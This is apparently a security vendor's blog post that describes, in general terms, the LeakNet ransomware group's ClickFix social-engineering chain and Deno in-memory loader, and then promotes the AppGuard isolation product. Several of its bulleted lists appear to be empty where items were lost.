Cyber attackers continue to evolve faster than many traditional security models can keep up with. A recent campaign involving the LeakNet ransomware group shows how modern adversaries are combining social engineering, trusted system tools, and in memory execution techniques to bypass defenses and quietly move toward full encryption of enterprise environments.
As detailed in The Hacker News report, LeakNet has adopted a ClickFix based attack chain delivered through compromised websites, paired with a Deno based in memory loader to execute malicious code directly inside the system without leaving obvious forensic traces on disk.
This combination significantly reduces detection opportunities and highlights a critical gap in traditional endpoint security approaches.
The ClickFix technique is a social engineering method that tricks users into believing there is a system or browser issue that needs immediate correction. Victims are instructed to copy and execute commands such as those entered through Windows Run or PowerShell.
In the LeakNet campaign, users are redirected from legitimate but compromised websites to fake verification or CAPTCHA style pages. These pages then instruct users to manually run commands that initiate malware execution.
This is not a technical exploit in the traditional sense. It is a manipulation of human trust combined with legitimate Windows tools.
Once the user executes the command, the attack chain begins immediately.
One of the most concerning aspects of this campaign is the use of a Deno based loader to execute malicious JavaScript or TypeScript payloads directly in memory.
According to the analysis, this approach allows attackers to:
This approach is part of a broader trend where attackers rely on legitimate frameworks and runtimes to disguise malicious activity as normal system behavior.
Once inside the environment, LeakNet proceeds through credential discovery, lateral movement, and data staging before ransomware deployment.
Most legacy endpoint security tools are built around a Detect and Respond philosophy. They assume that:
LeakNet style attacks expose the weakness in that assumption.
By the time detection occurs:
Detection is no longer early enough to prevent impact. It only confirms that compromise has already happened.
What makes ClickFix particularly effective is that it does not rely on software vulnerabilities.
Instead, it abuses three trusted layers:
This means even fully patched environments remain exposed because the attack does not need a software flaw. It only needs a user to execute a command.
This is where the security model needs to shift.
The goal can no longer be simply detecting malicious behavior. The goal must be preventing malicious code from executing meaningful actions in the first place.
A modern approach requires Isolation and Containment, where:
Instead of trying to identify every possible attack variation, the system limits what any unknown or untrusted code can do.
This fundamentally changes the outcome of attacks like ClickFix, because even if the user is tricked, the payload cannot fully execute its intended behavior.
AppGuard is designed around this exact shift in security thinking.
Rather than relying on signature based detection or post execution analysis, AppGuard enforces policy based control of applications and processes. This helps prevent malicious code from gaining the ability to execute destructive actions, even if it is already present on the system.
With a 10 year proven track record in production environments, AppGuard focuses on:
In scenarios like LeakNet ClickFix attacks, this means that even if a user is tricked into running a command, the resulting payload is far less likely to gain the access needed to move forward in the attack chain.
LeakNet’s adoption of ClickFix and in memory loaders is another clear signal that ransomware operators are prioritizing stealth, legitimacy, and user manipulation over traditional exploit based entry points.
Security teams that continue to rely only on Detect and Respond models are operating at a disadvantage. The attack is already inside the environment by the time it is detected.
The shift needs to happen now.
From detection focused security
To prevention through isolation and containment
Business owners and security leaders should consider how their current endpoint protection strategy would respond to an attack like LeakNet’s ClickFix campaign.
At CHIPS, we help organizations move beyond reactive security and toward a model built on Isolation and Containment using AppGuard, a proven endpoint protection solution with a decade of real world success.
If you want to understand how to reduce the impact of ransomware threats like this before they execute, talk with us at CHIPS about how AppGuard can strengthen your security posture and help prevent these types of incidents from becoming business disrupting events.
Like this article? Please share it with others!